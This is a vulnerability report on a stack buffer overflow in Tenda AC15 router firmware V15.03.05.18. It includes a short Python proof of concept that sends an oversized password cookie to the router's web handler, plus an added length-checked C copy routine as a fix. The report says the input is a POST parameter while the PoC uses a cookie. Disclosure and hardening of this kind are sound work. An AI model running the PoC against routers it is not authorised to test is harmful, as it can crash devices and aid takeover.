- Firmware download website: https://www.tenda.com.cn/download/detail-2710.html
AC15 V15.03.05.18
The Tenda AC15 V15.03.05.18 firmware has a stack overflow vulnerability in the `R7WebsSecurityHandler` function. The `src` variable receives the `password` parameter from a POST request and is later assigned to the `v35` variable, which is fixed at 128 bytes. However, since the user can control the input of `password`, the statement `strcpy(v35, src);` can cause a buffer overflow. The user-provided `password` can exceed the capacity of the `v35` array, triggering this security vulnerability.
```python
import requests
ip = "192.168.84.101"
url = "http://%s/goform/execCommand"%ip
cookie = {"Cookie":"password=" + "A"*1000}
ret = requests.get(url=url,cookies=cookie)
print(ret.text)
```
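
For contrast with the `strcpy(v35, src);` copy described above, the following is an added example (not code from the firmware or from this report) of a length-checked copy into a 128-byte buffer that rejects oversized input instead of truncating it. The names `copy_password_checked`, `handle_password`, `PASSWORD_BUF_SIZE` and the 400/200 return values are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define PASSWORD_BUF_SIZE 128  /* size of v35 as stated in the report */

/* Pattern described in the report (shown for contrast, never called here):
 *     char v35[128];
 *     strcpy(v35, src);    -- length of src is controlled by the client
 */

/*
 * Hardened copy (hypothetical helper). Returns 0 on success, -1 if src is
 * NULL or does not fit in dst together with its terminating NUL.
 * On failure dst is left as an empty string, so a caller that ignores the
 * return value never works with a silently truncated credential.
 */
int copy_password_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Bounded length scan: never reads more than dst_size bytes of src. */
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)        /* no room left for the NUL: reject */
        return -1;

    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Hypothetical handler fragment: refuse the request rather than overflow. */
int handle_password(const char *src, char out[PASSWORD_BUF_SIZE])
{
    if (copy_password_checked(out, PASSWORD_BUF_SIZE, src) != 0)
        return 400;  /* constructed status: oversized or missing password */
    return 200;
}
```

Rejecting rather than truncating matters for a password field: a truncated value could still be compared against a stored credential, whereas a rejected request never reaches the comparison.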